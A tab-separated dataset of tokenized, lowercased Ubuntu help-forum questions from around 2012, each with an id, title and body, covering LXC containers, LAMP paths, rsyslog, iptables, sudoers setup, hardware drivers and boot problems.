201392	how to manage juju 's lxc containers using virsh ?	i use the lxc driver for juju and i have created a local environment ; actually the well-known wordpress from https : //juju.ubuntu.com/docs/getting-started.html . i then tried export virsh_default_uri=lxc : /// virsh list and got an empty list of containers . where are the lxc containers which juju created for me ?
201397	lamp stack location	i have installed the lamp stack on ubuntu 12.04 lts using the tasksel command . i checked - it works . but i cant find the location of the installaton , i worked with wamp - there you have a separate folder for apache , for php and for mysql . now i cant even find where to put the documents i create . which folder is used to contain my web projects ? how to start mysql console and where to look for its installation directory ? which directories are php and apache installed in ? how to erase lamp stack ? i found out that some of the parts of the stack are installed in the root/var and root/etc directories ? how can i install the whole lamp stack in /home ?
201404	take a snapshot with `` prtscn '' key does n't work with classical gnome	if i press the `` prtscn '' button the ui flashes white but the following save dialog does n't open . i 'm using ubuntu 12.04 with the classical gnome .
201405	rsyslog does n't log tcp after upgrade from 10.4 to 12.4	i was using ubuntu 10.4 until last week for storing the log informations of a external device with rsyslog . after upgrading to ubuntu 12.4 the logging of tcp does n't works anymore . ( there are just no pakets visible - not even with tcpdump - aold ubuntu machine still sees the pakets . ) udp works with the identical configuration on the ubuntu machine and a `` use udp '' on the external device . are there any changes in rsyslog , that could explain this ? my rsyslog.conf file looks like this ( with more comments ) : $ modload imuxsock # provides support for local system logging $ modload imklog # provides kernel logging support ( previously done by rklogd ) # $ modload immark # provides -- mark -- message capability $ klogpath /proc/kmsg # provides udp syslog reception $ modload imudp $ udpserverrun 514 # provides tcp syslog reception $ modload imtcp $ inputtcpserverrun 514 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # global directives # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # $ actionfiledefaulttemplate rsyslog_traditionalfileformat # set the default permissions for all log files . # $ fileowner syslog $ filegroup adm $ filecreatemode 0640 $ dircreatemode 0755 $ umask 0022 $ privdroptouser syslog $ privdroptogroup syslog if $ fromhost-ip startswith '192.168.0.10 ' then /var/log/calidevice.log & ~ # local/regular rules , like ' . ' /var/log/syslog.log $ includeconfig /etc/rsyslog.d/*.conf
201407	ubuntu 12.04 vm goes dead unexpectedly	i 'm not a super savvy super user , so i 'm not sure what to look for . i have a vm running 12.04 . it runs fine , and then just dies ( no ping , no ssh ) . when i log into vmwaresphere , i see the vm still 'up ' , but the console gives me a response-less black screen . this lead me to believe that ubuntu was going into some sort of sleep/hibernate state . i double checked the power settings and found nothing out of the ordinary , so now i 'm stuck on how to fix the problem . there are 5-7 ( centos-5.8 & 6 ) machines running on the same server/vm setup with no problems at all .
201410	proxy to direct connection	i access internet through a proxy server which requires proxy authentication . how do i setup a direct connection so that applications do not need a proxy address ? something that could redirect all the traffic to the proxy server automatically ? i basically want to do this to use applications that do not have proxy options .
201411	extremely slow boot - ubuntu 12.04 64bit	since installation of ubuntu precise i have problem with boot time : nearly 45-60 minutes . i have no idea what 's wrong . my system is up to date . i have also boot chart installed but do n't know to inter prate the logs . one example is here . there also other logs from boot chart but i do n't understand them . regards and thank you for help
201412	is x86_64 a x86 or x64 ?	my ubuntu version is 12.04 , and when cat /proc/version , it shows linux version 3.2.0-23-generic ( buildd @ crested ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu4 ) ) # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 linux yuzhe-hp 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux here it shows the os is x86_64 . to install oracle jdk over linux , install package comes with two versions x86 and x64 . which should i choose for a x86_64 system ?
201415	how to remove a file from /opt ?	ubuntu 12.4 lts 64 bit i need to remove files that causing a problem in installing a program . the files are in the directory /opt and the files are in the directory /etc/polipo .
201417	how to install ubuntu via usb in portable drive	my harddisk has been corrupted and there is no way to fix it.i am using portable drive.i want to install ubuntu in portable drive . recently i have remove my internal hd of laptop and connect the portable one by usb.ok i also have installed ubuntu once in my portable drive.but the problem is that the boot startup hangs black/purple screen appears and it went hanging . some people tell me its the graphic cards issue.plzz tell me how to fix this problem . i am using dell inspiron n5010 4gbram ati hd 5650m and no internal hard drive in it only portable plugged and want to install the ubuntu in portable so i ca n't boot from it easily without any problems ...
201421	how do i boot any iso from a usb flash drive ?	so i know in my bios theres this settings in usb labled `` emulate device '' hdd/cdrom/fdd but im not even sure i understand what it means and i cant find it on the internet . do you remember the old samsung - u3 - virtual cdrom - usb disks ? thats what i want to do can anyone make a suggestion ?
201428	replacing my firewall rules	i 've had an init script for many years that configures iptables for me and it has worked like a champ until now . after upgrading from 10.04 to 12.04 i started having firewall problems where the rulesets were being corrupted . after some playing around i discovered that something is setting the following rules : chain input ( policy accept ) target prot opt source destination accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53 accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:67 chain forward ( policy accept ) target prot opt source destination accept all -- 0.0.0.0/0 192.168.122.0/24 state related , established accept all -- 192.168.122.0/24 0.0.0.0/0 accept all -- 0.0.0.0/0 0.0.0.0/0 reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain output ( policy accept ) target prot opt source destination even when i 've completely disabled my own firewall script . my first thought was ufw was somehow active - but it is n't : # ufw status status : inactive it may or may not be related , but i 've only seen this problem on machines i am running kvm on . does anyone have pointers to what could be doing this and how to disable whatever is adding these unwanted rules ? edit for people looking for this in the future : i finally located a source that definitively links these mystery iptables rules to libvirt : http : //libvirt.org/firewall.html
201430	how : windows remotely connects to ubuntu ?	how should i use no machine in windows to remotely connect to ubuntu12.04 ? i got this : authentication failed . do i need to configure something in ubuntu machine ? in ubuntu machine , i chose 'sharing ' in remote desktop preferences . thank you in advance !
201435	how do i use the mythbuntu repository on a headless server ?	i would like to set up my server to use the mythbuntu repositories to keep mythtv more up to date than the version in the offical ubuntu repositories . i know i can install mythbuntu-control-centre on my server and access it from another computer using ssh -x , but i would like to avoid using the graphical interface entirely if i can . so how do configure my server to use the mythbuntu repos without using a gui ?
201436	wifi light turns red but wireless still works when i close bluetooth on an hp dv6	i installed 12.04 and upgraded kernel to 3.6.1 . and now , when i close bluetooth on gnome , my wifi light turns red but wifi still works . i want to know how to fix it . ubuntu 12.04 kernel 3.6.1 hp dv6-2160et thanks for helps
201439	how to install ubuntu from usb and not delete windows xp	my computer currently runs on win xp , and i would like to install ubuntu 12.04 . i downloaded the iso file , booted a usb , and restarted my netbook . i selected the option to install ubuntu along windows xp , but it shows up a window that requires the partition division . what must i do to run ubuntu along windows xp ?
201441	wired internet not working with an intel 82579lm nic	i have been searching all day to no avail . i have just installed ubuntu 12.04 as dual boot on a dell optiplex 990 , which has a intel 82579lm nic . i have it wired up via ethernet to my college network , and it says it is connected to the wired network , yet i have not internet and can not ping anything . below i have included some basic checks ( pretty much the limit of my knowledge on this subject ) . it is worth noting that when running windows ( it is dual booted ) the internet works fine so nic is fine and so is the ethernet cable itself . i have also downloaded the driver for the nic from intel and installed on the machine in ubuntu ( driver downloaded from here ) i have run the following commands : ifconfig : aly @ neon : ~/downloads/e1000e-2.1.4/src $ ifconfig eth0 link encap : ethernet hwaddr 90 : b1:1c:5e:2a:06 inet6 addr : 2001:630:12:1082:92b1:1cff : fe5e:2a06/64 scope : global inet6 addr : 2001:630:12:1075:92b1:1cff : fe5e:2a06/64 scope : global inet6 addr : fe80 : :92b1:1cff : fe5e:2a06/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6268 errors:0 dropped:0 overruns:0 frame:0 tx packets:172 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:891800 ( 891.8 kb ) tx bytes:36150 ( 36.1 kb ) interrupt:20 memory : e1500000-e1520000 eth0 : avahi link encap : ethernet hwaddr 90 : b1:1c:5e:2a:06 inet addr:169.254.3.202 bcast:169.254.255.255 mask:255.255.0.0 up broadcast running multicast mtu:1500 metric:1 interrupt:20 memory : e1500000-e1520000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2152 errors:0 dropped:0 overruns:0 frame:0 tx packets:2152 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:137020 ( 137.0 kb ) tx bytes:137020 ( 137.0 kb ) lspci 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) ping 8.8.8.8 aly @ neon : ~/downloads/e1000e-2.1.4/src $ ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 169.254.3.202 icmp_seq=1 destination host unreachable from 169.254.3.202 icmp_seq=2 destination host unreachable from 169.254.3.202 icmp_seq=5 destination host unreachable from 169.254.3.202 icmp_seq=6 destination host unreachable from 169.254.3.202 icmp_seq=7 destination host unreachable from 169.254.3.202 icmp_seq=8 destination host unreachable and here is a screenshot of the connection information ( when connected to the wired network ) , it seems odd as there is no ipv4 addr
201442	unable to mount external hard drive	basically i my 12.10 update crashed halfway through , so i 've had to start again and put all my data onto an external hdd . it was all going fine until this came up : error mounting /dev/sdb1 at /media/amy/ca47-8339 : command-line `mount -t `` vfat '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush '' `` /dev/sdb1 '' `` /media/amy/ca47-8339 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so when i tried to restore my info off the hdd . now i 'm stuck completely clueless as to how i 'll get anything off the hard drive .
201450	using ati flgrx drivers	after installing ubuntu 12.04 i had the problem that i had a black screen directly after rebooting . so i used the grub option `` nomodeset '' to get an screen . i installed the recommended flgrx drivers and disabled the nomodeset option . still ca n't use my graphics card . also the option `` xforcevesa '' does not solve my problem . i would need 3d enabled because i need blender to work . i hope someone can help my to get my ati graphics card running . i do n't want to use windows : d this is my hardware lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5400 series ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati cedar hdmi audio [ radeon hd 5400/6300 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 7f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 7f:02.3 host bridge : intel corporation core processor reserved ( rev 02
201451	grub error after removing another linux partition with ubuntu	i have a problem , i had a dual boot system with windows 7 and ubuntu . i decided to try out linux mint . but after a while i removed it by deleting itâ´s partition . when i restarted , the bootloader didnâ´t work anymore . i reinstalled linux mint so that i could use my pc again . but i really want to remove mint from my system . is there a way to delete mint and still be able to boot in to ubuntu ?
201452	dash does not come when meta key is pressed and now application is open	for some reason the dash does not come up after pressing the meta key when no application is open , is there a way to fix that ?
201453	how to download a .tar.gz file	i 've been trying to download some linux programs , and i get.tar.gz files in my downloads . i 've been trying to extract it with terminal tar -zxvf , and always get no such file or directory i ca n't seem to find my root directory of the download . when i select properties on my tar.gz file , i get /home/downloads is there no c : \ ? i installed ubuntu alongside windows 7 without making a custom partition , is that why ? i would really appreciate it if you guys could help me out .
201456	iptables forwarding	i have a server with zentyal 3.03 ( ubuntu 12.04 ) lts . it has 3 lan card . eth0 - dhcp fast internet ( i pay for it ) eth1 - static slow internet ( it 's free for the school ) eth2 - lan i can reach the server with ssh , but i ca n't reach a lan server from outside . i have set up portforwarding for port 80 , it made no sence . i used : sudo iptables -a forward -p tcp -i eth1 -- sport 8888 -o eth2 -d 192.168.1.90 -dport 8888 -j allow . i do n't know what can help , please ask what to show you .
201460	how do i download/buy music ?	i have used limewire in the past with windows , now i use ubuntu and im not sure what to use . i dont know how to look for the music i want and be able to keep it in my music . i do n't know about copyright infringement , but no that 's not what i want to do . i 'm wanting to buy music not steal it .
201462	why does ejabberd start fail ?	i am trying to install ejabberd 2.1.10-2 on my ubuntu 12.04.1 server . this is a fresh install , and ejabberd is never successfully installed . the install every time , apt-get hangs on this : setting up ejabberd ( 2.1.10-2ubuntu1 ) ... generating ssl certificate /etc/ejabberd/ejabberd.pem ... creating config file /etc/ejabberd/ejabberd.cfg with new version starting jabber server : ejabberd ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... failed . the dots just go forever until it times out or i 'killall ' beam , beam.smp , epmd , and ejabberd processes . i 've turned off all firewall restrictions . here 's the output of epmd -names while the install is hung : epmd : up and running on port 4369 with data : name ejabberdctl at port 42108 name ejabberd at port 39621 and after it fails : epmd : up and running on port 4369 with data : name ejabberd at port 39621 at the same time ( during and after ) , the output of both netstat -atnp | grep 5222 and netstat -atnp | grep 5280 is empty . the crash file a crash dump file is create at /var/log/ejabber/erl_crash.dump . the slogan ( i.e . reason for the crash ) is : slogan : kernel pid terminated ( application_controller ) ( { application_start_failure , kernel , { shutdown , { kernel , start , [ normal , [ ] ] } } } ) it 's alive ? whenever i try to relaunch ejabberd with service ejabberd start , the same thing happens - even if i 've killed all processes before doing so . however , when i killall the processes listed above again , and run su - ejabberd -c /usr/sbin/ejabberd , this is the output i get : erlang r14b04 ( erts-5.8.5 ) [ source ] [ 64-bit ] [ rq:1 ] [ async-threads:0 ] [ kernel-poll : false ] eshell v5.8.5 ( abort with ^g ) ( ejabberd @ ns1 ) 1 > =info report==== 15-oct-2012 : :12:26:13 === i ( < 0.478.0 > : ejabberd_listener:166 ) : reusing listening port for 5222 =info report==== 15-oct-2012 : :12:26:13 === i ( < 0.479.0 > : ejabberd_listener:166 ) : reusing listening port for 5269 =info report==== 15-oct-2012 : :12:26:13 === i ( < 0.480.0 > : ejabberd_listener:166 ) : reusing listening port for 5280 =info report==== 15-oct-2012 : :12:26:13 === i ( < 0.40.0 > : ejabberd_app:72 ) : ejabberd 2.1.10 is started in the node ejabberd @ ns1 then , the server appears to be running . i get a login prompt when i access http : //mydomain.com:5280/admin/ . of course i ca n't login unless i create an account . at this time , the output of netstat -atnp | grep 5222 and netstat -atnp | grep 5280 is as follows : tcp 0 0 0.0.0.0:5222 0.0.0.0 : * listen 19347/beam tcp 0 0 0.0.0.0:5280 0.0.0.0 : * listen 19347/beam ejabberdctl even when it appears ejabberd is running , trying to do anything with ejabberdctl fails . for example : trying to register a user : root @ ns1 : ~ # ejabberdctl register myusername mydomain.com mypassword failed rpc connection to the node ejabberd @ ns1 : nodedown i have no idea what i 'm doing wrong . this happens on two different servers i have with identical software installed ( really not much of anything ) . please help . thanks .
201471	switching terminal with ctrl+alt+f1 does n't work	i 've upgraded to ubuntu 12.04 and using ctrl-alt-f1 ( or f2 , f3 , ... ) no longer switches to a different terminal like it used to in 10.04 . is this the result of a change in some default setting ? is there a way to restore the old behavior ?
201474	bootloader does n't show after installing 12.04 using wubi	i installed ubuntu 12.04 on my acer aspire ( 8930 ) machine which uses windows 7 ultimate . i used wubi to install and after the reboot my laptop rebooted in ubuntu . after trying to install additional drivers i had to reboot and then i rebooted to windows . it just skipped the bootloader . is this a common problem ? and how do i fix this ? edit : windows time to display operating systems is 10. bcdedit shows : http : //imageshack.us/photo/my-images/84/naamloosdhg.png/ wubildr shows : http : //imageshack.us/photo/my-images/405/naamloos2td.png/
201477	12.10 poor quality sound when using headphones	recently upgraded to 12.10 - i know it 's not released yet . having issues with sound when using headphones plugged into the front ports . something that does n't happen when booting to windows - so fairly confident it 's an ubuntu issue . when listening to any sound , music , video etc the sound levels jump up and down and click . if i open `` sound '' from the settings menu when playing videos or music and viewing the `` output '' tab i can see `` headphone - built-in audio disappear and reappear ( very quickly ) so i 'm guessing the system is jumping back to the `` analogue output '' and back again which is why the sound volume changes and clicks . worth noting i never used my headphones when 12.04 was installed so not sure if it 's this os or ubuntu hates my hardware generally . anyone seen this before ? any advice ? sound is built in to motherboard . i have the gigabyte ga-x58a-ud5 .
201479	run script on wacom bamboo button press	i have wacom bamboo tablet which has some buttons on the device . how can i configure a script to be run when i press one of them ?
201483	help with installing brother printer mfcj270w	i need help with installing my brother printer model : mfc-j270w . i found all of the required linux drivers for this printer from the brother website , i just need guidance on how to install this via terminal . i tried on my own but failed . any help is appreciated . here is the brother website for my specific printer . http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/download_prn.html # mfc-j270w brother mfc-j270w
201485	how can i recover files inside a wubi install before re-installing ubuntu ?	i failed to inter ubuntu with this error gnu grub version 1.99-21 ... ... ..etc i spoke with technical support at www.ubuntu.com he was really nice and he served me will i thank him very much ... . but i did n't like his last solution from the helpfulpost of boot-info i can see that the partition where you installed ubuntu ( wubi /dev/sda1 ) is corrupted . the boot-repair tool attempted to repair thatwith the fsck command but it was n't possible . ( failed ) . i have not further suggestion but to remove ubuntu installation from within windows ( control panel > programs > programs and feautures > uninstall ) and then install it again . of course you will lose your datafrom ubuntu . thanks can you give me other solution or tool so i can save my personal files ! ! ! ! ! this is my `` boot repair '' report http : //paste.ubuntu.com/1281522/
201488	win32.malware.heur_generic.a . ( kcloud )	i recently started using ubuntu as my main os , but i am sort of addicted to ms office so i installed playonlinux to be able to use it . i also use ubuntu one cloud service to make back up of certain files like my assignments and other personal files . but recently i started observing some strange lnk.desktop files showing on my desktop . they appear when ever i open ms word to type my projects . they point to a folder in the /home/z3r0n/.wine/drive_c/windows/command/start.exe folder . i copied the file that they point to and uploaded it to an online virus scanner which identified the file as a cloud malware . /home/z3r0n/.wine/drive_c/windows/command/start.exe win32.malware.heur_generic.a . ( kcloud ) 3f886e0ea4eb35074c4d3341e8383273b6f245823bc1ea934f47561199206040 sha256 9620af530f0400fafcf6e0b35427d9e60b71f394 sha1 fe66b5254d369c6dffe4e8055f926578 md5 i want to know if any of you guys have experienced something similar . i made a clean install and i am now using libreoffice instead . i am trying to stay away from ubuntuone cloud and installing playonlinux until i find i a valid lead . any pointers will be appreciated
201496	no internet connection with an atheros ar8121/ar8113/ar8114 adapter	i have ubuntu on my netbook . it wont connect to the internet , i did a system check and i have a attansic technology corp. atheros ar8121/ar8113/ar 8114 pci-e , ethernet controller ( revb0 ) . i 'm not sure how to get it to connect can someone please help me out ?
201498	.sol files editor for ubuntu	i 'm looking some editor for .sol files ( lso/local shared object ) . can you please suggest one ? i have looked but could not find any for ubuntu .
201502	ubuntu server 12.04 connected to internet via adsl router with cable eth0 . how can i share this connection	i have an ubuntu server 12.04 connected to internet via adsl router with cable eth0 . the ubuntu server has the static ip 192.168.10.33 the adsl router ( as dns ) has the ip 192.168.10.254 which i set as gateway in /etc/network/interfaces . i want another ubuntu ( laptop ) , with ip 192.168.10.1 with wlan0 to connect to internet through the ubuntu server and not through the adsl router ( which is easy ) . how can i do this ?
201505	how do i install and run a tftp server ?	i have an embedded vxworks target that needs to boot its kernel from my ubuntu computer . how do i install and run a tftp server ?
201506	alsa samples capture : can not open device	i 'm quite new to linux ( lubuntu 12.04 for sake of precision ) and alsa programming at all . i 'm trying to write a c program to capture audio from internal pc microphone for processing it . so as first step i google a bit and i found this article for capturing audio samples a tutorial on using the alsa audio api but when i compile it and execute it with : ./mycapture `` default '' or ./mycapture `` hw:0,0 '' and all the possible variants on theme it always raises the error : can not open device hw:0,0 ( no such file or directory ) . so the issue is : what is the name of the mic audio device to pass as parameter to record the audio from mic ? the mic is working ok because the sound recorder program records sounds perfectly and i can playback them . the output of the aplay -l is the following : **** list of playback hardware devices **** card 0 : i82801dbich4 [ intel 82801db-ich4 ] , device 0 : intel ich [ intel 82801db-ich4 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : i82801dbich4 [ intel 82801db-ich4 ] , device 4 : intel ich - iec958 [ intel 82801db-ich4 - iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 and this is the amixer output ( cut ) simple mixer control 'master',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ on ] front right : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'master mono',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 31 mono : playback 4 [ 13 % ] [ -40.50db ] [ on ] simple mixer control 'pcm',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 12.00db ] [ on ] front right : playback 31 [ 100 % ] [ 12.00db ] [ on ] simple mixer control 'cd',0 capabilities : pvolume pswitch cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : front left - front right capture channels : front left - front right limits : playback 0 - 31 front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] capture [ off ] simple mixer control 'mic',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined cswitch cswitch-exclusive penum capture exclusive group : 0 playback channels : mono capture channels : front left - front right limits : playback 0 - 31 mono : playback 22 [ 71 % ] [ -1.50db ] [ on ] front left : capture [ on ] front right : capture [ on ] simple mixer control 'mic boost ( +20db ) ',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'mic select',0 capabilities : enum items : 'mic1 ' 'mic2' item0 : 'mic1' simple mixer control 'stereo mic',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] so for aplay it seems i have no recording device , but for amixer i 've got the mic , a mic boost and mic stereo as well with all those gorgeous stuffs on their place ! ! . if so , how could my sound recorder record the audio without any problem at all ? ! ? ! for sure i 'm giving the wrong device name to the command line for capturing audio but i 'm loosing the hope for finding the correct one ! please help ... .before i tear my hair out ! ! !
201507	how can i delete a review in the ubuntu software center ?	i want to delete or at least modify a review in a program at ubuntu software center . i was wondering if there is any way i can do that since i logged in with the account i had written the review , and there was no option to modify my review . any help would be appreciated !
201512	home on its own partition	i have installed 11.10 and looking to do in place upgrade to 12.04 lts . i think i partitioned it such that home is its own partition so an upgrade could leave it insulated . i have some questions a ) how do i confirm that home is its own partition . something i look for in df command ? i get all discombobulated with the /sda1 and /sdb2 and so on . b ) can i install another linux and share the same home partition with it ? c ) are my software applications installed in the home partition so i do n't potentially compromise them when i upgrade ? thanks !
201513	hp deskjet 720c usb printer does n't finish	i have an hp deskjet 720c connected through a usb cable to an ubuntu 12.04 laptop . when i plugged the printer for the first time into the fresh 12.04 laptop install , it auto-detected the printer correctly and choose the recommended drivers without a problem . the document print fine until they reach the end of the last page , then suddenly stop just about the end leaving the page unfinished . i have checked that the margins are the correct ones . i have the latest version of cups installed . i have also tried changing the options of usb-unidir-default and usb-no-reattach-default via lpadmin , but the printing stops even earlier . edit : it seems like the problem is with the last page . so if i am printing 3 pages , the first two work well but the last few lines in the last page are not printed . any ideas ?
201516	is there a legit reason as to why outlook.com premium ui is `` not available '' in linux chrome ?	well if you use outlook owa in chrome on ubuntu ( or any linux distro ) , you will get a stripped down version of it basically . you can get around it by faking your user agent , to appear that you are using firefox . so my question is.. is there some legitimate reason microsoft does that , or are they just being a****s ? ? ? i mean once you have the user agent faked , it works perfectly . ps . just in case anyone else need to use outlook , here is the command to start it with fake useragent : /opt/google/chrome/google-chrome -- user-agent= '' mozilla/5.0 ( windows ; u ; windows nt 5.2 ; en-us ) applewebkit/534.4 ( khtml , like gecko ) chrome/6.0.481.0 safari/534.4 ''
201521	installing ubuntu to other disk from running system	i 'd like to install ubuntu on a disk which is connected ( but not mounted ) , without booting from a dvd or usb . the goal is to have ubuntu installed on an external disk , unplug it , plug it to other computer and run . i know it takes 20 minutes etc etc . i simply want to do it from a running system , without need to reboot that . what are my options ?
201522	how to copy all .sol files in a system to a specific folder	i want to copy all the files that i have in the system with extension sol to the specific folder can you please help me . i tried sudo cp / *.sol ~/sol/ but it does n't work updated : i tried to follow the first answer , and that 's what i got : root @ johntheripper-portege-z835 : ~ # find / -name *.sol | wc -l 61 root @ johntheripper-portege-z835 : ~ # find / -type f -name '*.sol ' -exec cp { } ~/sol \ ; ... ... ... root @ johntheripper-portege-z835 : ~ # find ~/sol -name *.sol | wc -l 26 as you can see 26 out of 61 file was copied , please help me to copy the rest .
201523	apt-get update specific list ?	i 'm working on a scripted install of something , and one of the parts is adding an apache bigtop repo and installing things from it . but having to do an apt-get update before installing is quite time consuming because of all of the other mirrors touched ( and i do an update before hand to make sure the system has previously used tools in the script ) . is there either a way to do an update that does n't update everything or a way to do an install and specify a repo/list that has n't been updated ?
201533	how do i make a compiz sphere look like a planet ?	i have read topics of people that what to style their compiz sphere like a planet and set a background image like space . it definitely very good idea , but i have not been able to find a tutorial of how this is done ( only some clips in youtube of people who have done this and a plugin , but it is not known to work work 12.04 version of ubuntu ) . i have set my settings of compiz manager , so i have a sphere now , but i need some help with the images that i need to set . has anyone idea how these pictures should be created and who the compiz will concatenate them ? edit : one of the answers here is showing how to set different images on each work space on ubuntu 12.04 - is it possible to have a different background for each workspace ? what is left are the images - maybe someone will offer a way how to generate them ?
201534	sudo non-password access to /sys/power/state	on my computer , pm-hibernate appears to be broken , however using the command echo disk > /sys/power/state appears to work perfectly . now i just need regular user access to it , using sudo . how do i do this ? the command sudo echo disk > /sys/power/state simply returns bash : /sys/power/state : permission denied . also , i need this in a regularly used script , how can i make it so that i do n't have to type in my password for it to work ? ? ?
201537	pgadmin iii does n't work due to `` the server lacks instrumentation functions . ''	when pgadmin iii is used to open a postgresql database the following message appears . there does not seem to be any obvious package listed in the ubuntu software center for this . the server lacks instrumentation functions . pgadmin iii uses some support functions that are not available by default in all postgresql versions . these enable some tasks that make life easier when dealing with log files and configuration files . the adminpack is installed and activated by default if you are running the one-click installer of postgresql . on unix , you may have to install the contrib package , either with your package installer tool or by compilation .
201539	windows wireless drivers - install	i have nearly ended my journey of making a dual-boot windows xp and ubuntu computer . along with version 12.04 , came the problem with my netgear wnda3100v2 wireless adapter . it was n't compatible . my last step in my adventure is to install the software called windows wireless drivers . i have internet access on my laptop and a flash drive . it would be preferable to receive a link to this program , because i see no link on the website , and i ca n't download it from the ubuntu software center . thanks .
201540	juju not deploying zookeeper when deploying on openstack	i am using juju with openstack , when it bootstraps , it dose not deploy zookeeper on the bootstrap vm . i logged into this vm to verify . 1 ) how is zookeeper and other software installed on juju vm , is it ssh and apt-get during bootstrap process . thanks
201541	how to install old amd catalyst 12.4 drivers on ubuntu 12.10 ?	i have an ati radeon hd 3650 agp , which does not support 12.8 and 12.9 drivers . the latest supported version is 12.4 , but catalyst 12.4 does not support ubuntu 12.10 . how can i downgrade to 12.4 or 12.6 catalyst drivers in ubuntu 12.10 ?
201544	how to run a file with sudo without a password ?	i 've made a script that preforms various system tasks , that i run regularly , but i have to use sudo to run the script , despite the fact that i own it because it runs root privileged commands . how can i add make sudo let me run this one file without having to enter my password every time i run it ? i know that there are questions regarding running commands without a password , but i was n't able to find one on running a file without a password . i am aware of the security risks , but i 'm at home on a computer that i trust . i added john all = nopasswd : /home/john/.script/hibernate.sh to my /etc/sudoers but when running the command sudo sh /home/john/.script/hibernate.sh it still prompts me for my password ...
201553	can i update ubuntu from a point release cd ?	i have ubuntu 12.04 installed and i am using a mobile broadband connection , so bandwidth is precious . what i would like to do is to enable only security updates . then when version 12.04.1 is released ( which it already is ) , download it over a different connection ( probably not on an ubuntu machine ) and burn it to disk , and then use it to update the system . is this possible ?
201555	ubuntu wo n't install on custom build	just built my first computer , trying to install ubuntu , when i tell my bios to startup from disk drive it says : '' please insert boot media into boot device '' so i insert my burned disc and my computer thinks for a few seconds and then prompts me again . any idea why ? tried multiple times , burned two discs , i have even confirmed that my build works by swapping hard drives with the computer i 'm currently using to post this , so i 'm kinda out of answers right now and hoping you guys can help me find something i 've done wrong , thanks in advance for any help .
